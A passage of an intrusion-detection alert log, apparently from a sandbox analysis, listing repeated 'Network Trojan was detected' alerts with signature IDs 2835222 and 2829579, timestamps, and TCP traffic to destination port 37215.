                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.919428
                SID:2835222
                Source Port:48082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629218
                SID:2829579
                Source Port:39574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165855
                SID:2829579
                Source Port:56594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.039820
                SID:2835222
                Source Port:55274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.968336
                SID:2835222
                Source Port:56584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854501
                SID:2829579
                Source Port:47010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.070153
                SID:2835222
                Source Port:52222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.996459
                SID:2835222
                Source Port:39478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983387
                SID:2835222
                Source Port:44026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319271
                SID:2835222
                Source Port:37338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140280
                SID:2829579
                Source Port:60136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.513072
                SID:2829579
                Source Port:52990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567658
                SID:2829579
                Source Port:34398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783677
                SID:2829579
                Source Port:45056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615237
                SID:2829579
                Source Port:51998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.068218
                SID:2829579
                Source Port:32904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.935932
                SID:2835222
                Source Port:34226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240436
                SID:2835222
                Source Port:38244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.544559
                SID:2829579
                Source Port:41064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665784
                SID:2829579
                Source Port:41380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765515
                SID:2829579
                Source Port:59396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227472
                SID:2835222
                Source Port:54904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088440
                SID:2835222
                Source Port:38178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931468
                SID:2835222
                Source Port:39436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.960992
                SID:2835222
                Source Port:49020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.861523
                SID:2829579
                Source Port:60310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715213
                SID:2829579
                Source Port:45378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039389
                SID:2835222
                Source Port:41328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.612458
                SID:2835222
                Source Port:43676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655622
                SID:2835222
                Source Port:39422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982959
                SID:2829579
                Source Port:52728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782804
                SID:2829579
                Source Port:60328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982702
                SID:2829579
                Source Port:48720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941467
                SID:2835222
                Source Port:58820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659603
                SID:2829579
                Source Port:59978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.708404
                SID:2835222
                Source Port:40518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422562
                SID:2829579
                Source Port:40490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841317
                SID:2835222
                Source Port:55734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.837326
                SID:2835222
                Source Port:43568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.783147
                SID:2829579
                Source Port:40176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897673
                SID:2829579
                Source Port:55974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684283
                SID:2829579
                Source Port:41948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292212
                SID:2829579
                Source Port:50444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778359
                SID:2829579
                Source Port:60398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931681
                SID:2835222
                Source Port:36786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.034668
                SID:2829579
                Source Port:37138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.673661
                SID:2835222
                Source Port:39490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.235457
                SID:2829579
                Source Port:46838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.443190
                SID:2835222
                Source Port:47782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.943074
                SID:2835222
                Source Port:48076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.979404
                SID:2829579
                Source Port:42888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816013
                SID:2835222
                Source Port:57366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165247
                SID:2829579
                Source Port:47728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863485
                SID:2835222
                Source Port:42062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432378
                SID:2829579
                Source Port:51142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735194
                SID:2835222
                Source Port:54826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.960887
                SID:2835222
                Source Port:39246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868811
                SID:2835222
                Source Port:44376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683578
                SID:2829579
                Source Port:50376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615085
                SID:2835222
                Source Port:60678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856262
                SID:2835222
                Source Port:51268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.083098
                SID:2829579
                Source Port:54612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559524
                SID:2829579
                Source Port:46328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.944788
                SID:2829579
                Source Port:49512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236850
                SID:2835222
                Source Port:37150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791635
                SID:2829579
                Source Port:34756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896994
                SID:2829579
                Source Port:42734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809506
                SID:2835222
                Source Port:58318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.688959
                SID:2835222
                Source Port:33666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683599
                SID:2835222
                Source Port:44760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.932123
                SID:2829579
                Source Port:37230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.725812
                SID:2835222
                Source Port:37906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790793
                SID:2829579
                Source Port:59956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857039
                SID:2829579
                Source Port:54942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947004
                SID:2829579
                Source Port:49790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521395
                SID:2835222
                Source Port:38082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532108
                SID:2829579
                Source Port:52576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022373
                SID:2835222
                Source Port:59172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612824
                SID:2835222
                Source Port:51354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.769902
                SID:2835222
                Source Port:42114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651740
                SID:2829579
                Source Port:39264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.842469
                SID:2829579
                Source Port:46224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008669
                SID:2829579
                Source Port:58798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951410
                SID:2829579
                Source Port:56146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659738
                SID:2835222
                Source Port:36692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.561944
                SID:2829579
                Source Port:33706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421394
                SID:2829579
                Source Port:60552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684934
                SID:2829579
                Source Port:56364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.879265
                SID:2829579
                Source Port:33664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.278501
                SID:2829579
                Source Port:50842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386218
                SID:2829579
                Source Port:55312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227312
                SID:2835222
                Source Port:55934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209822
                SID:2835222
                Source Port:39714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573865
                SID:2835222
                Source Port:46414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.938795
                SID:2829579
                Source Port:35102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.243512
                SID:2829579
                Source Port:57512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335924
                SID:2829579
                Source Port:46208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997409
                SID:2835222
                Source Port:43700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321155
                SID:2835222
                Source Port:47458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207902
                SID:2829579
                Source Port:47900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212141
                SID:2829579
                Source Port:37374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.605729
                SID:2835222
                Source Port:57896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.365825
                SID:2829579
                Source Port:47074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.980972
                SID:2829579
                Source Port:45170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.822897
                SID:2829579
                Source Port:58878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240165
                SID:2829579
                Source Port:33188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226879
                SID:2835222
                Source Port:41856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681999
                SID:2835222
                Source Port:49652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013764
                SID:2829579
                Source Port:33400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.696358
                SID:2835222
                Source Port:54376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.869499
                SID:2829579
                Source Port:53040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765209
                SID:2835222
                Source Port:35162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563256
                SID:2835222
                Source Port:59812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.266653
                SID:2829579
                Source Port:53192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890903
                SID:2835222
                Source Port:48068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.043840
                SID:2829579
                Source Port:40798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281292
                SID:2835222
                Source Port:60814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384214
                SID:2829579
                Source Port:50370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951016
                SID:2829579
                Source Port:33336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.973426
                SID:2829579
                Source Port:37956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.899861
                SID:2829579
                Source Port:54700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074986
                SID:2835222
                Source Port:39156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287875
                SID:2835222
                Source Port:46838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.448874
                SID:2829579
                Source Port:35558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.808494
                SID:2829579
                Source Port:48994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135572
                SID:2829579
                Source Port:45656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210711
                SID:2835222
                Source Port:56886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787958
                SID:2835222
                Source Port:47012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.743563
                SID:2835222
                Source Port:43544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.808507
                SID:2829579
                Source Port:41384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574715
                SID:2835222
                Source Port:57794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420052
                SID:2835222
                Source Port:33568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887506
                SID:2829579
                Source Port:57312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681911
                SID:2829579
                Source Port:46566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.959379
                SID:2835222
                Source Port:49264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212333
                SID:2829579
                Source Port:43844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.578991
                SID:2829579
                Source Port:46976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.082785
                SID:2835222
                Source Port:38820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.848035
                SID:2835222
                Source Port:59198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.399169
                SID:2829579
                Source Port:34220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862762
                SID:2835222
                Source Port:47852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.460464
                SID:2829579
                Source Port:34654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949565
                SID:2835222
                Source Port:48132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339225
                SID:2829579
                Source Port:39744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931839
                SID:2829579
                Source Port:39914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.069722
                SID:2835222
                Source Port:41048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.433034
                SID:2829579
                Source Port:45174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228490
                SID:2829579
                Source Port:40186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.337156
                SID:2835222
                Source Port:59000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.034876
                SID:2829579
                Source Port:56768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.787978
                SID:2829579
                Source Port:58624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873228
                SID:2829579
                Source Port:45622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226787
                SID:2835222
                Source Port:38606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668062
                SID:2835222
                Source Port:39962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511103
                SID:2829579
                Source Port:36196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.787886
                SID:2829579
                Source Port:35368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571432
                SID:2835222
                Source Port:49542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.513716
                SID:2835222
                Source Port:41666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009490
                SID:2829579
                Source Port:55648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863464
                SID:2829579
                Source Port:44594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.839101
                SID:2835222
                Source Port:45054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001018
                SID:2835222
                Source Port:42400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.734482
                SID:2835222
                Source Port:57438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009685
                SID:2829579
                Source Port:59566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855967
                SID:2829579
                Source Port:49250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515129
                SID:2835222
                Source Port:36776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519064
                SID:2835222
                Source Port:51414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928249
                SID:2829579
                Source Port:51838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852228
                SID:2829579
                Source Port:40528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025094
                SID:2829579
                Source Port:46640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074667
                SID:2829579
                Source Port:41184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.288093
                SID:2835222
                Source Port:33066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732042
                SID:2829579
                Source Port:32924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981167
                SID:2835222
                Source Port:52378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919856
                SID:2829579
                Source Port:48232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.671051
                SID:2829579
                Source Port:34232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321593
                SID:2829579
                Source Port:44366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088470
                SID:2835222
                Source Port:58048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.835920
                SID:2835222
                Source Port:51728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277186
                SID:2835222
                Source Port:58346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.267896
                SID:2829579
                Source Port:34450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336086
                SID:2829579
                Source Port:43072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919441
                SID:2829579
                Source Port:49140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.239282
                SID:2835222
                Source Port:34968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361766
                SID:2829579
                Source Port:36530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257347
                SID:2829579
                Source Port:34806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990827
                SID:2835222
                Source Port:50308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586302
                SID:2835222
                Source Port:35362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.835816
                SID:2829579
                Source Port:40062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165693
                SID:2835222
                Source Port:43292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141909
                SID:2835222
                Source Port:52238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509818
                SID:2829579
                Source Port:46432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644710
                SID:2835222
                Source Port:35238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873541
                SID:2829579
                Source Port:43520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420321
                SID:2829579
                Source Port:43492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951043
                SID:2835222
                Source Port:58366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.587575
                SID:2829579
                Source Port:45508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
